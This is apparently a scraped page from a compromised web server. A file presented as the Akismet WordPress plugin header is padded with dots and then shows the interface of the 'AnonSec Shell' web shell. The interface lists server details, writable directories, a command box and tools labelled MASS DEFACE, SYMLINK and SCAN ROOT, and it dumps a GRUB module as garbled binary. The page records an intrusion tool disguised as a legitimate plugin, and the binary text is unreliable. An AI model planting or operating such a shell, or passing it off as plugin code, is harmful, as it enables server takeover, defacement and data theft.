#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 62.109.13.187  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28
System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : mosrembit ( 6064)
PHP Version : 8.2.28
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/grub/i386-pc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib/grub/i386-pc/video_colors.mod
ELF 4(
U)щ�S�Y�����w-Iu��E��
��D�M��E��1ҍE��E�����1���[]�U��W��V��S1ۃ�����t�������u�����C�׃�[^_]�U��WVS�Ã�,�U����u�<#u3�s1�������t�C�߃�߃�A<��G�D;�Ѓ�0��	w����0��	wu1�1҉�����,�E�������te�p1�1҉�����,�E�������tD�X1�1҉�����,�E�������u�E��3@1�1�����E��$�U�������uPShj��������=u�E�}ԉ���G���wN1ҹ���Y������E���E������E���1������E��b������_���E�t	���g���1ҹ��������E��������E�������}��E����������������e�[^_]�!�+���8���=��H�N���T���[�a���p��u�+��**��޸���_��������i���P��d��������<���������������������d�
������k� ���,Uk/�;���F�2�Q��Y�z�d����qH=��/OO��/OO����������������iii��iii�������""�����"�"�����������#���(ڥ �2����7��=��/�I����N��W�i��_�\\�iK��p���v��|�����|������������������������������������z� ���!���.w���=w���L���[���g��l2�2�v���|�������fͪ�����U���p��<�q��{h������H�����p�����)���3��<�ޭ�H��M���U���[k�#�e���l�E�v�p�}������������p��������ڹ��ͅ?������ݠ������������������Ai��E���r��`�.�W�&���/�R-�6����=���EjZ�Op���Yp���c����h��tF���~Ҵ�������ؿ���cG��@������޳������������������2�invalid color specification `%s'aliceblueantiquewhiteaquaaquamarineazurebeigebisqueblackblanchedalmondbluebluevioletbrownburlywoodcadetbluechartreusechocolatecoralcornflowerbluecornsilkcrimsoncyandarkbluedarkcyandarkgoldenroddarkgraydarkgreendarkgreydarkkhakidarkmagentadarkolivegreendarkorangedarkorchiddarkreddarksalmondarkseagreendarkslatebluedarkslategraydarkslategreydarkturquoisedarkvioletdeeppinkdeepskybluedimgraydimgreydodgerbluefirebrickfloralwhiteforestgreenfuchsiagainsboroghostwhitegoldgoldenrodgraygreengreenyellowgreyhoneydewhotpinkindianredindigoivorykhakilavenderlavenderblushlawngreenlemonchiffonlightbluelightcorallightcyanlightgoldenrodyellowlightgraylightgreenlightgreylightpinklightsalmonlightseagreenlightskybluelightslategraylightslategreylightsteelbluelightyellowlimelimegreenlinenmagentamaroonmediumaquamarinemediumbluemediumorchidmediumpurplemediumseagreenmediumslatebluemediumspringgreenmediumturquoisemediumvioletredmidnightbluemintcreammistyrosemoccasinnavajowhitenavyoldlaceoliveolivedraborangeorangeredorchidpalegoldenrodpalegreenpaleturquoisepalevioletredpapayawhippeachpuffperupinkplumpowderbluepurpleredrosybrownroyalbluesaddlebrownsalmonsandybrownseagreenseashellsiennasilverskyblueslateblueslategrayslategreysnowspringgreensteelbluetantealthistletomatoturquoisevioletwheatwhitewhitesmokeyellowyellowgreenLICENSE=GPLv3+video_colors	��#/;HSF@ngrub_errnogrub_video_parse_colorgrub_strcmpgrub_strchrgrub_isspacegrub_errorgrub_video_get_named_colorgrub_strtoul8Xc
n���&5IXcj
x� (08@HPX`hpx���������������� (08@HPX`hpx���������������� (08@HPX`hpx���������������� (08@HPX`hpx���������������� (08@HPX`hpx���.symtab.strtab.shstrtab.rel.text.rel.rodata.rodata.str1.1.data.module_license.bss.modname4Z	@��
)��%	@$�
120�@
F
V
[

 
	 {�d

Anon7 - 2022
AnonSec Team